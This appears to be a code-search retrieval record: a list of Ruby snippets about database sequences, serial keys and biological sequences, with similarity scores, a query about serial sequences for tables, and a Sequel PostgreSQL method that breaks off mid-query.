"def generate_sequence(comparison)\n identifier = []\n identifier << {\n \"system\" => \"https://precision.fda.gov/fhir/Sequence/\",\n \"value\" => comparison.uid,\n }\n\n coding = []\n %w(ref_vcf ref_bed).each do |role|\n input = comparison.input(role)\n next if input.blank?\n\n coding << {\n \"system\" => \"https://precision.fda.gov/files\",\n \"code\" => input.user_file.dxid,\n \"display\" => input.user_file.public? ? input.user_file.name : input.user_file.dxid,\n }\n end\n\n standard_sequence = { \"coding\" => coding }\n\n app = App.find_by(dxid: COMPARATOR_V1_APP_ID)\n coding = []\n\n if app\n coding << {\n \"system\" => \"https://precision.fda.gov/apps\",\n \"code\" => app.dxid,\n \"display\" => app.title,\n \"version\" => app.revision.to_s,\n }\n end\n\n method = {\n \"coding\" => coding,\n }\n\n quality_data = {\n \"type\" => \"unknown\",\n \"standardSequence\" => standard_sequence,\n \"method\" => method,\n \"truthTP\" => comparison.meta[\"true-pos\"].to_i,\n \"truthFN\" => comparison.meta[\"false-neg\"].to_i,\n \"queryFP\" => comparison.meta[\"false-pos\"].to_i,\n \"precision\" => comparison.meta[\"precision\"].to_f,\n \"recall\" => comparison.meta[\"recall\"].to_f,\n \"fMeasure\" => comparison.meta[\"f-measure\"].to_f,\n }\n\n # For ROC data points, convert them to floats before exporting\n meta_roc = comparison.meta[\"weighted_roc\"]\n\n headers_map = {\n \"score\" => \"score\",\n \"true_positives\" => \"numTP\",\n \"false_positives\" => \"numFP\",\n \"false_negatives\" => \"numFN\",\n \"precision\" => \"precision\",\n \"sensitivity\" => \"sensitivity\",\n \"f_measure\" => \"fMeasure\",\n }\n\n if meta_roc[\"data\"].present?\n headers = {}\n\n meta_roc[\"header\"].map.each_with_index do |h, i|\n new_key = headers_map[h]\n\n case h\n when \"score\", \"true_positives\", \"false_positives\", \"false_negatives\"\n headers[new_key] = meta_roc[\"data\"].map { |d| d[i].to_i }\n else\n headers[new_key] = meta_roc[\"data\"].map { |d| d[i].to_f }\n end\n end\n\n quality_data[\"roc\"] = headers\n end\n\n quality = []\n quality << quality_data\n repository = []\n\n %w(test_vcf test_bed).each do |role|\n input = comparison.input(role)\n next if input.blank?\n\n repository << {\n \"type\" => \"login\",\n \"url\" => \"https://precision.fda.gov#{pathify(input.user_file)}\",\n \"name\" => \"PrecisionFDA\",\n \"variantsetId\" => input.user_file.dxid,\n }\n end\n\n {\n \"resourceType\" => \"Sequence\",\n \"type\" => \"dna\",\n \"coordinateSystem\" => 1,\n \"identifier\" => identifier,\n \"quality\" => quality,\n \"repository\" => repository,\n }\n end",
"def list_sequences(starts_with)\n self.select_rows(\"SHOW TABLES LIKE '#{starts_with}%_sequence'\").map { |result| result.first.gsub('_sequence', '') }\n end",
"def data(opts = {})\n sources = self.attributes[:sources] || []\n seq_opts = {:kind => self.attributes[:kind].to_sym}.merge(opts)\n sequence = SequenceQuery.new(sources, seq_opts)\n seqs = sequence.sequences\n seqs.map do |seq|\n {\n :data => seq[1],\n :start_time => sequence.start_time_epoch,\n :source => seq[0]\n }\n end\n end",
"def sequence\n return @sequence\n end",
"def sequence_separator; end",
"def sequences(name = nil)\n query(PostgreSQLExtensions::Utils.strip_heredoc(<<-SQL), name).map { |row| row[0] }\n SELECT c.relname AS sequencename\n FROM pg_class c\n WHERE c.relkind = 'S'::\"char\";\n SQL\n end",
"def dataset\n DB[SQL, from: from_truncated, to: to_truncated, tick: tick]\n end",
"def make_tnt_input(seq_arr)\n seq_arr_length = seq_arr[0][:seq].length()\n retstr = \"xread\\n#{seq_arr_length} 49\\n\"\n seq_arr.each { |sa| retstr << \"#{sa[:genus]} #{sa[:seq]}\\n\" }\n retstr << \";\\n\"\nend",
"def generate_aasequences\n (0..self.sequence.length-1).each do |i|\n AAsequence.create(:seq_id=> self.seq_id,\n :amino_acid=>self.sequence[i],\n :original_position=>i)\n end\n end",
"def sample_data\n %w(A,B,1 A,C,2 B,C,3 B,D,3 C,D,1 B,E,2 D,F,3 D,E,3 E,G,3 F,G,1)\n end",
"def get_dataset(table)\n #puts \"converting to a dataset\"\n to_dataset(@datafiles[table].content)\n end",
"def scaf_serial_columns\n scaf_columns.select { |c| c.primary }\n end",
"def primary_key_sequence(table, opts=OPTS)\n quoted_table = quote_schema_table(table)\n Sequel.synchronize{return @primary_key_sequences[quoted_table] if @primary_key_sequences.has_key?(quoted_table)}\n cond = {Sequel[:t][:oid] => regclass_oid(table, opts)}\n value = if pks = _select_serial_sequence_ds.first(cond)\n literal(SQL::QualifiedIdentifier.new(pks[:schema], pks[:sequence]))\n elsif pks = _select_custom_sequence_ds.first(cond)\n literal(SQL::QualifiedIdentifier.new(pks[:schema], LiteralString.new(pks[:sequence])))\n end\n\n Sequel.synchronize{@primary_key_sequences[quoted_table] = value} if value\n end",
"def predict_format_converter usages\r\n @date = []\r\n @total = []\r\n @lines = []\r\n @labels = []\r\n @table_array = []\r\n usages[:daily_usage].each do |usage|\r\n @date.append(usage[:date].to_s)\r\n\r\n @total.append(usage[:usage])\r\n end\r\n @table_array.append(\"date[i]\")\r\n @table_array.append(\"total[i]\")\r\n usages[:daily_time_periods].each_with_index do |period, index|\r\n @name =\"lines[#{index.to_s}][i]\"\r\n @table_array.append(@name)\r\n @lines.append([])\r\n @labels.append(period[:label])\r\n period[:daily_usage].each do |usage|\r\n @lines[index].append(usage[:usage])\r\n\r\n end\r\n end\r\n end",
"def table \n table = data.map do |slot|\n slot.position.to_s.ljust(12) + slot.license_plate.ljust(19) + slot.color + \"\\n\" if slot\n end.join('')\n end",
"def serial_no\n [doc_series, doc_no].join(' ')\n end",
"def sequence=(value)\n @sequence = value\n end",
"def make_sequence\n 4.times do\n self.sequence << COLORS.sample\n end\n end",
"def uses_sequence?\n select_value(\"SELECT name FROM sqlite_master WHERE type='table' AND name='sqlite_sequence';\")\n end",
"def qseq; @seq1.seq; end",
"def default_sequence_name(table, _column)\n \"#{table}_seq\"\n end",
"def getFtsProtSequences\n @gbkObj.each_cds do |ft|\n ftH = ft.to_hash\n loc = ft.locations\n gene = []\n product = []\n protId = \"\"\n if ftH.has_key? \"pseudo\"\n next\n end\n gene = ftH[\"gene\"] if !ftH[\"gene\"].nil?\n product = ftH[\"product\"] if !ftH[\"product\"].nil?\n protId = ftH[\"protein_id\"][0] if !ftH[\"protein_id\"].nil?\n locustag = ftH[\"locus_tag\"][0] if !ftH[\"locus_tag\"].nil?\n dna = getDna(ft,@gbkObj.to_biosequence)\n pep = ftH[\"translation\"][0] if !ftH[\"translation\"].nil?\n pepBioSeq = Bio::Sequence.auto(pep)\n seqout = pepBioSeq.output_fasta(\"#{@accession}|#{loc}|#{protId}|#{locustag}|#{gene[0]}|#{product[0]}\",60)\n puts seqout\n end\n end",
"def hseq; @seq2.seq; end",
"def five_prime_utr_seq\n return self.seq[0, self.coding_region_cdna_start - 1]\n end",
"def getFtsNtSequences\n @gbkObj.each_cds do |ft|\n ftH = ft.to_hash\n loc = ft.locations\n gene = []\n product = []\n protId = \"\"\n gene = ftH[\"gene\"] if !ftH[\"gene\"].nil?\n product = ftH[\"product\"] if !ftH[\"product\"].nil?\n protId = ftH[\"protein_id\"][0] if !ftH[\"protein_id\"].nil?\n locustag = ftH[\"locus_tag\"][0] if !ftH[\"locus_tag\"].nil?\n dna = getDna(ft,@gbkObj.to_biosequence)\n seqout = dna.output_fasta(\"#{@accession}|#{loc}|#{protId}|#{locustag}|#{gene[0]}|#{product[0]}\",60)\n puts seqout\n end\n end",
"def sequence\n return self.dna.sequence\n end",
"def sequence(chr, start = nil, stop = nil)\n raise SequenceFileError, \"Do not now how to query for sequences from #{File.basename(@data_file)}!\"\n end",
"def serial_adj\n serial_word\n end",
"def seq\n @values.fetch('seq') { \n @values['seq'] = nil\n }\n end",
"def genetic_code_table; 11; end",
"def default_sequence_name(table_name, pk = nil) #:nodoc:\n result = serial_sequence(table_name, pk || 'id')\n return nil unless result\n Utils.extract_schema_qualified_name(result).to_s\n rescue ActiveRecord::StatementInvalid\n Redshift::Name.new(nil, \"#{table_name}_#{pk || 'id'}_seq\").to_s\n end",
"def reset_sequence_numbers\n result = Database.connection.exec(\"SELECT table_name FROM information_schema.tables WHERE table_schema = 'public';\")\n table_names = result.map { |row| row.values_at('table_name')[0] }\n\n table_names_with_id_column = table_names.select do |table_name|\n result = Database.connection.exec(\"SELECT column_name FROM information_schema.columns WHERE table_name = '#{table_name}';\")\n column_names = result.map { |row| row.values_at('column_name')[0] }\n column_names.include?('id')\n end\n\n table_names_with_id_column.each do |table_name|\n result = Database.connection.exec(\"SELECT pg_get_serial_sequence('#{table_name}', 'id');\")\n sequence_name = result.getvalue(0, 0)\n Database.connection.exec(\"SELECT setval('#{sequence_name}', (select MAX(id) from #{table_name}));\")\n end\n end",
"def cds_seq\n cds_length = self.coding_region_cdna_end - self.coding_region_cdna_start + 1\n \n return self.seq[(self.coding_region_cdna_start - 1), cds_length]\n end",
"def seq\n Sequence::NA.new( fetch('').gsub(/ /,'').gsub(/\\d+/,'') )\n end",
"def data_attributes\n @schema.schema.select {|k,_| k.to_s.start_with?('data_') or k.to_s.start_with?('data-')}.inject({}) {|col,(k,v)| col[k[5..-1].to_sym]=v;col}\n end",
"def create_column_data_array\n\ttable_id = create_table_id('../data/census_column_metadata.csv')\n\tcolumn_id = create_column_id('../data/census_column_metadata.csv')\n\t\n\t[title_processor,table_id,column_id].transpose\n\nend",
"def dataset\n database[table_name]\n end",
"def get_sequence\n raise NotImplementedError, \"This is an abstract class\"\n end",
"def pk_and_sequence_for(table_name, with_seq_schema = false)\n result = select_rows(\n \"SELECT kc.column_name, \"+\n (with_seq_schema ? \"c.sequence_schema, \" : \"\") +\n \" c.sequence_name \"+\n \"FROM information_schema.table_constraints tc \"+\n \"INNER JOIN information_schema.key_column_usage kc \"+\n \" ON tc.table_schema = kc.table_schema \"+\n \" AND tc.table_name = kc.table_name \"+\n \" AND tc.constraint_name = kc.constraint_name \"+\n \"LEFT JOIN information_schema.columns c \"+\n \" ON kc.table_schema = c.table_schema \"+\n \" AND kc.table_name = c.table_name \"+\n \" AND kc.column_name = c.column_name \"+\n \"WHERE tc.table_schema = CURRENT_SCHEMA \"+\n \" AND tc.table_name = '#{table_name}' \"+\n \" AND tc.constraint_type = 'PRIMARY KEY'\",\n SCHEMA_LOG_NAME\n )\n (result.length == 1) ? result[0] : nil\n rescue\n nil\n end",
"def build_model_sequences\n [Organization, Person, Deal, Project, LedgerTransaction, Invoice].each do |model_class|\n\n model_class_name = model_class.name\n if model_sequences.select { |ms| ms.model_class == model_class_name }.empty?\n\n sequence = ModelSequence.new\n sequence.model_class = model_class_name\n\n # Set the current value to 9999 for all but ledger transactions.\n sequence.current_value = 9999 unless model_class == LedgerTransaction\n\n model_sequences << sequence\n\n end\n\n end\n end",
"def add_sequences(repository, model)\n model.properties(repository.name).each do |property|\n create_sequence(repository, property) if property.serial?\n end\n end",
"def getIndexSequence(laneBarcode)\n if !laneIndexed?(laneBarcode)\n return \"\"\n else\n tag = laneBarcode.gsub(/^[1-8]-ID/, \"\")\n return @pipelineHelper.findBarcodeSequence(\"ID\" + tag.to_s) \n end\n end",
"def next_serial_number\n serial = permute(permute(@offset % BOUNDARY))\n @offset += STEP\n serial\n end",
"def getSequence\r\n\t\t\t\t\treturn @sequence\r\n\t\t\t\tend",
"def generate_data(item)\n acc = []\n extra_offset=0\n case item\n when MFComplexSequence\n inline_seq_header(HEADER_TYPES[:boxed], cell_width + 1, item.content.length, acc)\n item.content.each do |elt|\n if elt.is_a? MFIntLit\n type = HEADER_TYPES[:data]\n content = int_bytes(elt.value,cell_width)\n else\n type = HEADER_TYPES[:base_ref]\n content = int_bytes(generate_data(elt),2)+[0,0]\n end\n acc << type\n acc.concat content\n end\n when Quotation\n puts \"generating non-inline quotation: #{item} \" if Rake.verbose == true\n inline_seq_header(HEADER_TYPES[:quotation], 1, quotation_length(item.body), acc)\n item.body.each {|w| word_bytecode(w,acc)}\n acc << prim(:qend)\n extra_offset=1\n when MFStringLit then word_bytecode(item,acc)\n when MFLitSequence then word_bytecode(item,acc)\n else\n raise \"cannot generate data segment for #{item.class}\"\n end\n loc = @data_counter\n puts \"constant data at #{loc} \" if Rake.verbose == true\n @data.concat acc\n @data_counter += acc.length\n # referenced address should point to count byte, except for quotations, where it\n # points directly to the first instruction\n return loc + 2 + extra_offset\n end",
"def index\n @attrs['SeqNum']\n end",
"def seq\n return self.slice.seq\n end",
"def seq\n if @seq.nil?\n @seq = ''\n self.exons.each do |exon|\n @seq += exon.seq\n end\n end\n return @seq\n end",
"def generate_dataset\n return nil if query.nil?\n # execute the query\n data = Array ActiveRecord::Base.connection.execute(query)\n return [] if data.empty?\n # Convert the query into an easy to read format\n @dataset = [data.first.keys]+data.map{|dd|dd.values}\n return @dataset\n end",
"def initialize(primary_key, uuid, uti, note)\n # Set this objects's variables\n super(primary_key, uuid, uti, note)\n\n # This will hold our reconstructed table\n @reconstructed_table = Array.new\n\n # These variables hold different parts of the protobuf\n @row_items = Array.new\n @table_objects = Array.new\n @uuid_items = Array.new\n @type_items = Array.new\n\n @total_rows = 0\n @total_columns = 0\n\n # This will hold a mapping of UUID index number to row Array index in @reconstructed_table\n @row_indices = Hash.new\n\n # This will hold a mapping of UUID index number to column Array index in @reconstructed_table\n @column_indices = Hash.new\n\n # This will hold the table's direction, it defaults to left-to-right, will be changed during rebuild_table if needed\n @table_direction = LEFT_TO_RIGHT_DIRECTION\n rebuild_table\n end",
"def load_tsbs\n @seq_key = TSBS::Default_SkillSequence\n @seq_key = TSBS::Default_ItemSequence if is_a?(RPG::Item)\n @prepare_key = \"\"\n @return_key = \"\"\n @reflect_anim = animation_id\n first_time = true\n note.split(/[\\r\\n]+/).each do |line|\n case line \n when TSBS::SequenceREGX\n if first_time\n @seq_key = [$1.to_s]\n first_time = false\n else\n @seq_key.push($1.to_s)\n end\n when TSBS::PrepareREGX\n @prepare_key = $1.to_s\n when TSBS::ReturnREGX\n @return_key = $1.to_s\n when TSBS::ReflectAnim\n @reflect_anim = $1.to_i\n end\n end\n end",
"def load_tsbs\n @seq_key = TSBS::Default_SkillSequence\n @seq_key = TSBS::Default_ItemSequence if is_a?(RPG::Item)\n @prepare_key = \"\"\n @return_key = \"\"\n @reflect_anim = animation_id\n first_time = true\n note.split(/[\\r\\n]+/).each do |line|\n case line \n when TSBS::SequenceREGX\n if first_time\n @seq_key = [$1.to_s]\n first_time = false\n else\n @seq_key.push($1.to_s)\n end\n when TSBS::PrepareREGX\n @prepare_key = $1.to_s\n when TSBS::ReturnREGX\n @return_key = $1.to_s\n when TSBS::ReflectAnim\n @reflect_anim = $1.to_i\n end\n end\n end",
"def prepare_sequence(sequence)\n nv = remove_non_amino_acids(sequence)\n split_sequence(nv)\n end",
"def convert_serial_to_identity(table, opts=OPTS)\n raise Error, \"convert_serial_to_identity is only supported on PostgreSQL 10.2+\" unless server_version >= 100002\n\n server = opts[:server]\n server_hash = server ? {:server=>server} : OPTS\n ds = dataset\n ds = ds.server(server) if server\n\n raise Error, \"convert_serial_to_identity requires superuser permissions\" unless ds.get{current_setting('is_superuser')} == 'on'\n\n table_oid = regclass_oid(table)\n im = input_identifier_meth\n unless column = (opts[:column] || ((sch = schema(table).find{|_, sc| sc[:primary_key] && sc[:auto_increment]}) && sch[0]))\n raise Error, \"could not determine column to convert from serial to identity automatically\"\n end\n column = im.call(column)\n\n column_num = ds.from(:pg_attribute).\n where(:attrelid=>table_oid, :attname=>column).\n get(:attnum)\n\n pg_class = Sequel.cast('pg_class', :regclass)\n res = ds.from(:pg_depend).\n where(:refclassid=>pg_class, :refobjid=>table_oid, :refobjsubid=>column_num, :classid=>pg_class, :objsubid=>0, :deptype=>%w'a i').\n select_map([:objid, Sequel.as({:deptype=>'i'}, :v)])\n\n case res.length\n when 0\n raise Error, \"unable to find related sequence when converting serial to identity\"\n when 1\n seq_oid, already_identity = res.first\n else\n raise Error, \"more than one linked sequence found when converting serial to identity\"\n end\n\n return if already_identity\n\n transaction(server_hash) do\n run(\"ALTER TABLE #{quote_schema_table(table)} ALTER COLUMN #{quote_identifier(column)} DROP DEFAULT\", server_hash)\n\n ds.from(:pg_depend).\n where(:classid=>pg_class, :objid=>seq_oid, :objsubid=>0, :deptype=>'a').\n update(:deptype=>'i')\n\n ds.from(:pg_attribute).\n where(:attrelid=>table_oid, :attname=>column).\n update(:attidentity=>'d')\n end\n\n remove_cached_schema(table)\n nil\n end",
"def sequencePrimaries(synsets)\n #\n #A synset's \"primaries\" are those words/phrases in the set; i.e., its collection of synonyms\n #Those synsets (via parameterization) whose synset_t2_map(s) indicates its primaries have\n #not yet been sequenced are done so here. \n #\n progress=0\n synsets.each do |synset|\n unless (synsetmaps=SynsetT2Map.find_all_by_synset_id(synset.synsetid))==[]\n synsetmaps.each do |synmap|\n######Console progress indicator################## \n progress=progress+1\n if progress%9==0\n print '.'\n if progress%100==0\n print \"+\\n\"\n end\n end\n##################################################\n unless ((synmap.th_sequence_id==nil) || \n (synmap.primaries_sequenced) || \n (synmap.th_phrase_definition_id==nil))\n #Add this phrase/definition pair as a ThMember of sequence.\n th_member = ThMember.create(:th_sequence_id => synmap.th_sequence_id,\n :th_phrase_definition_id => synmap.th_phrase_definition_id,\n :ordinality => PRIMARY_ORD,\n :th_mod_info_id => MyDModInfo.id)\n #Set the flag to indicate that the primary word/phrase for this phrase/definition pair\n #has been added as member to the sequence.\n synmap.update_attribute(:primaries_sequenced, TRUE)\n end\n end\n end\n end\n end",
"def _metadata_dataset\n super.\n with_identifier_input_method(identifier_input_method_default).\n with_identifier_output_method(identifier_output_method_default)\n end",
"def table_constraints(table, constraint_type, options={})\n\t \tds, result = metadata_dataset, []\n\t\t\t\toutm = sql_ident_to_sym_proc ds\n\t \tschema, table = ds.schema_and_table(table).map{|k| k.to_s.send(ds.identifier_input_method) if k} \n\t \tx_cons = schema.nil? ? 'user_cons' : 'all_cons'\n\t \t\n\t \t# Build the dataset and apply filters for introspection of constraints.\n\t\t\t\t# Also allows the caller to customize the dataset.\n\t \tds = ds.select(:c__constraint_name, :c__table_name, :c__rely, :c__status, :c__validated, :cc__column_name).\n\t\t\t\t from(:\"#{x_cons}traints___c\").\n\t\t\t\t join(:\"#{x_cons}_columns___cc\", [ [:owner,:owner], [:constraint_name,:constraint_name] ]).\n\t\t\t\t\t\t\t\twhere((options[:table_name_column]||:c__table_name)=>table, :c__constraint_type=>constraint_type).\n\t order(:table_name, :status.desc, :constraint_name, :cc__position)\n\t\t\t\tds = ds.where :c__owner => schema unless schema.nil?\n\t\t\t\tds = ds.where :c__status => (options[:enabled] ? 'ENABLED' : 'DISABLED') unless options[:enabled].nil?\n\t\t\t\tds = ds.where :c__validated => (options[:validated] ? 'VALIDATED' : 'NOT VALIDATED') unless options[:validated].nil?\n\t\t\t\tif constraint_type == 'R'\n\t ds = ds.select_more(:c__r_constraint_name, :t__table_name.as(:r_table_name)).\n\t\t\t\t\t join(:\"#{x_cons}traints___t\", [ [:owner,:c__r_owner], [:constraint_name,:c__r_constraint_name] ]).\n\t where(:t__constraint_type=>'P')\n\t\t\t\telse\n\t ds = ds.select_more(:c__index_name)\n\t\t\t\tend\n\t\t\t\t\n\t\t\t\t# Return the table constraints as a hash of subhashes, including a column list.\n\t\t\t\thash = {}\n\t\t\t\tds.each do |row|\n\t\t\t\t\tkey = outm[row[:constraint_name]]\n\t\t\t\t\tunless subhash = hash[key]\n\t\t\t\t\t\tsubhash = hash[key] = {\n\t\t\t\t\t\t\t:rely=>(row[:rely]=='RELY'), :enable=>(row[:status]=='ENABLED'),\n\t\t\t\t\t\t\t:validate=>(row[:validated]=='VALIDATED'), :columns=>[]\n\t\t\t\t\t\t}\n\t\t\t\t\t\tif row.include? :r_constraint_name\n\t\t\t\t\t\t\tsubhash[:ref_constraint] = outm[row[:r_constraint_name]]\n\t\t\t\t\t\t\tif options[:table_name_column]==:t__table_name\n\t\t\t\t\t\t\tthen subhash[:table] = outm[row[:table_name]]\n\t\t\t\t\t\t\telse subhash[:ref_table] = outm[row[:r_table_name]]\n\t\t\t\t\t\t\tend\n\t\t\t\t\t\telsif row.include? :index_name\n\t\t\t\t\t\t\tsubhash[:using_index] = outm[row[:index_name]]\n\t\t\t\t\t\tend\n\t\t\t\t\tend\n\t\t\t\t\tsubhash[:columns] << outm[row[:column_name]]\n\t\t\t\tend\n\t\t\t\thash\n\t \tend",
"def resourceType\n 'Sequence'\n end",
"def dataset\n @dataset ||= generate_dataset\n end",
"def query_def; @seq1.definition; end",
"def make_next_seq_no\n if EdiHelper.current_out_is_cumulative || @return_a_string\n @out_seq = 1\n else\n @out_seq = MesControlFile.next_seq_edi(MesControlFile.const_get(\"EDI_#{@flow_type.upcase}\"))\n @seq_increased = true\n end\n @formatted_seq = sprintf('%03d', @out_seq)\n end",
"def setSequence(sequence) \r\n\t\t\t\t\t@sequence = sequence\r\n\t\t\t\tend",
"def table_array\r\n @table_array\r\n end",
"def sequences(name = nil) raise \"Internal Error: Connection adapter didn't override abstract function\"; [] end",
"def hseq; @genomic.seq; end",
"def sequence\n if !sequence?\n raise NotImplementedException, \"Attempted to get the sequence of a velvet node that is too short, such that the sequence info is not fully present in the node object\"\n end\n kmer_length = @parent_graph.hash_length\n\n # Sequence is the reverse complement of the ends_of_kmers_of_twin_node,\n # Then the ends_of_kmers_of_node after removing the first kmer_length - 1\n # nucleotides\n length_to_get_from_fwd = corresponding_contig_length - @ends_of_kmers_of_twin_node.length\n fwd_length = @ends_of_kmers_of_node.length\n raise \"Programming error\" if length_to_get_from_fwd > fwd_length\n revcom(@ends_of_kmers_of_twin_node)+\n @ends_of_kmers_of_node[-length_to_get_from_fwd...fwd_length]\n end",
"def start; @sequence[0]; end",
"def target\n unless defined?(@target)\n d = @data\n @target = SeqDesc.new(d[6], d[7], d[13], d[14], d[15], d[16],\n split_comma(d[20]), split_comma(d[22]))\n end\n @target\n end",
"def query_def; seq1.definition; end",
"def next_val_sequence(name)\n if self.class.to_s =~ /ActiveRecord::ConnectionAdapters::Mysql/\n self.insert_sql(\"INSERT INTO %s_sequence VALUES(NULL)\" % name)\n else\n # the default insert_sql is nonsense, but jdbc_mysql doesn't override it\n self.execute(\"INSERT INTO %s_sequence VALUES(NULL)\" % name)\n end\n end",
"def initialize\n @sequence = []\n end",
"def initialize(sequence:)\n @sequence = sequence\n end",
"def ids(tab, offset, n, ep, x)\n ret = (0..n - 1).to_a.product((\"A\"..\"E\").to_a).map{ |s|\n tab + \"-\" + s[1].to_s + \"-\" + s[0].to_s.rjust(2,\"0\")\n }\n if x\n ret += (0..n - 1).to_a.map{ |s| tab + \"-X-\" + s.to_s.rjust(2,\"0\") }\n end\n if !ep\n ret = ret.map{ |e| (0..4).to_a.map{ |l| e + \"-\" + l.to_s.rjust(2,\"0\") } }.flatten\n end\n ret = ret.each_with_index.map{ |l, i| [offset + i, l] }.to_h\nend",
"def sequence_params\n params.require(:sequence).permit(:title, :description, :data, :user_id, :location_id)\n end",
"def rows_enum\n data_maker.questions.\n map{|q|q.attribute_name}.\n uniq.select{|val| val.size > 0 && !self.cols.include?(val)}\n end",
"def __foreign_key_list_ds(reverse)\n if reverse\n ctable = Sequel[:att2]\n cclass = Sequel[:cl2]\n rtable = Sequel[:att]\n rclass = Sequel[:cl]\n else\n ctable = Sequel[:att]\n cclass = Sequel[:cl]\n rtable = Sequel[:att2]\n rclass = Sequel[:cl2]\n end\n\n if server_version >= 90500\n cpos = Sequel.expr{array_position(co[:conkey], ctable[:attnum])}\n rpos = Sequel.expr{array_position(co[:confkey], rtable[:attnum])}\n # :nocov:\n else\n range = 0...32\n cpos = Sequel.expr{SQL::CaseExpression.new(range.map{|x| [SQL::Subscript.new(co[:conkey], [x]), x]}, 32, ctable[:attnum])}\n rpos = Sequel.expr{SQL::CaseExpression.new(range.map{|x| [SQL::Subscript.new(co[:confkey], [x]), x]}, 32, rtable[:attnum])}\n # :nocov:\n end\n\n ds = metadata_dataset.\n from{pg_constraint.as(:co)}.\n join(Sequel[:pg_class].as(cclass), :oid=>:conrelid).\n join(Sequel[:pg_attribute].as(ctable), :attrelid=>:oid, :attnum=>SQL::Function.new(:ANY, Sequel[:co][:conkey])).\n join(Sequel[:pg_class].as(rclass), :oid=>Sequel[:co][:confrelid]).\n join(Sequel[:pg_attribute].as(rtable), :attrelid=>:oid, :attnum=>SQL::Function.new(:ANY, Sequel[:co][:confkey])).\n join(Sequel[:pg_namespace].as(:nsp), :oid=>Sequel[:cl2][:relnamespace]).\n order{[co[:conname], cpos]}.\n where{{\n cl[:relkind]=>%w'r p',\n co[:contype]=>'f',\n cpos=>rpos\n }}.\n select{[\n co[:conname].as(:name),\n ctable[:attname].as(:column),\n co[:confupdtype].as(:on_update),\n co[:confdeltype].as(:on_delete),\n cl2[:relname].as(:table),\n rtable[:attname].as(:refcolumn),\n SQL::BooleanExpression.new(:AND, co[:condeferrable], co[:condeferred]).as(:deferrable),\n nsp[:nspname].as(:schema)\n ]}\n\n if reverse\n ds = ds.order_append(Sequel[:nsp][:nspname], Sequel[:cl2][:relname])\n end\n\n ds\n end",
"def _dataset_method\n :\"_#{self[:name]}_dataset\"\n end",
"def calculate_deps\n SequenceDependency\n .where(ALL_SEQ_DEPS, device.id)\n .where(dependency_type: \"Point\")\n .where(dependency_id: points.pluck(:id))\n .map(&:sequence)\n end",
"def prepare_identities_from_data; end",
"def convert_input_dataset(ds)\n case ds\n when Symbol, SQL::Identifier, SQL::QualifiedIdentifier, SQL::AliasedExpression, LiteralString\n self.simple_table = db.literal(ds).freeze\n ds = db.from(ds)\n when Dataset\n ds = ds.from_self(:alias=>ds.first_source) if ds.joined_dataset?\n\n self.simple_table = if ds.send(:simple_select_all?)\n ds.literal(ds.first_source_table).freeze\n end\n @db = ds.db\n else\n raise(Error, \"Model.set_dataset takes one of the following classes as an argument: Symbol, LiteralString, SQL::Identifier, SQL::QualifiedIdentifier, SQL::AliasedExpression, Dataset\")\n end\n\n set_dataset_row_proc(ds.clone(:model=>self))\n end",
"def dataset\n @dataset ||= data_maker.dataset\n end",
"def initialize_values\n #skip the first 5 bytes, don't know what they are for and they don't contain the data.\n @data.read(5)\n \n @attributes = columns.inject({}) do |hash, column|\n \n #get the unpack flag to get this data.\n value = @data.read(column.length).unpack(\"#{column.flag(column.type, column.length)}\").first\n hash[column.name] = value\n hash[column.name.underscore] = value\n \n hash\n end\n end",
"def three_prime_utr_seq\n return self.seq[self.coding_region_cdna_end..-1]\n end",
"def default_sequence_name(table_name, pri_key = nil)\n serial_sequence(table_name, pri_key || 'id').split('.').last\n rescue ActiveRecord::StatementInvalid\n \"#{table_name}_#{pri_key || 'id'}_seq\"\n end",
"def sequence_id\n object.sequence._id.to_s\n end",
"def dataset_method\n :\"#{self[:name]}_dataset\"\n end",
"def getPep (cds, seq)\n\nend",
"def to_s(tab,table)\r\n\t\ts = \"\"\r\n\t\tif @instrucciones != nil\r\n\t\t\ts << @instrucciones.to_s(tab,table) + (\" \"*(tab))+\"Sequencing\\n\" + @instruccion.to_s(tab+1,table)\r\n\t\t\r\n\t\telse\r\n\t\t\ts << @instruccion.to_s(tab,table)\r\n\t\tend\r\n\r\n\t\treturn s\r\n\tend"
] |
[
"0.700258",
"0.56914324",
"0.5634827",
"0.55601764",
"0.55468976",
"0.53256935",
"0.5324605",
"0.52987653",
"0.52987653",
"0.52441895",
"0.52351105",
"0.5192623",
"0.5109223",
"0.5084473",
"0.50460196",
"0.503191",
"0.5023268",
"0.501827",
"0.49391106",
"0.49349368",
"0.4928668",
"0.49207178",
"0.49120754",
"0.49084523",
"0.48968145",
"0.487809",
"0.48708004",
"0.48585534",
"0.48448452",
"0.48291627",
"0.48267564",
"0.482545",
"0.48128808",
"0.48119414",
"0.4809747",
"0.4808586",
"0.48062107",
"0.4803351",
"0.47951317",
"0.4792993",
"0.47848207",
"0.47723404",
"0.47536528",
"0.47534683",
"0.4752293",
"0.47427973",
"0.47259828",
"0.47252488",
"0.47134617",
"0.47130415",
"0.47129148",
"0.47106066",
"0.47006574",
"0.4687794",
"0.46757862",
"0.4675554",
"0.4672518",
"0.46712458",
"0.46693122",
"0.46675152",
"0.4658706",
"0.46375066",
"0.46285123",
"0.46285123",
"0.4625008",
"0.46232235",
"0.4622557",
"0.46165118",
"0.46153665",
"0.46057162",
"0.46052867",
"0.45975167",
"0.45836958",
"0.45805565",
"0.45782197",
"0.4578198",
"0.45739073",
"0.45737848",
"0.45693862",
"0.4563443",
"0.45625955",
"0.4556211",
"0.45551485",
"0.4550036",
"0.4546474",
"0.4539692",
"0.4537845",
"0.45276913",
"0.45235446",
"0.4520538",
"0.45154604",
"0.451543",
"0.45137388",
"0.45048428",
"0.45036694",
"0.44900894",
"0.44827604",
"0.44785562",
"0.44748482",
"0.4472459"
] |
0.6921501
|
1
|
Dataset used to determine normal serial sequences for tables
|
def _select_serial_sequence_ds
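  # Walks the system catalogs: pg_depend ties each sequence (a pg_class row
  # with relkind 'S') to the column that owns it, pg_constraint restricts
  # that column to the first column of the table's primary key, and
  # pg_namespace supplies the schema name for the sequence.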
@_serial_sequence_ds ||= metadata_dataset.
from{[
pg_class.as(:seq),
pg_attribute.as(:attr),
pg_depend.as(:dep),
pg_namespace.as(:name),
pg_constraint.as(:cons),
pg_class.as(:t)
]}.
where{[
[seq[:oid], dep[:objid]],
[seq[:relnamespace], name[:oid]],
[seq[:relkind], 'S'],
[attr[:attrelid], dep[:refobjid]],
[attr[:attnum], dep[:refobjsubid]],
[attr[:attrelid], cons[:conrelid]],
[attr[:attnum], cons[:conkey].sql_subscript(1)],
[attr[:attrelid], t[:oid]],
[cons[:contype], 'p']
]}.
select{[
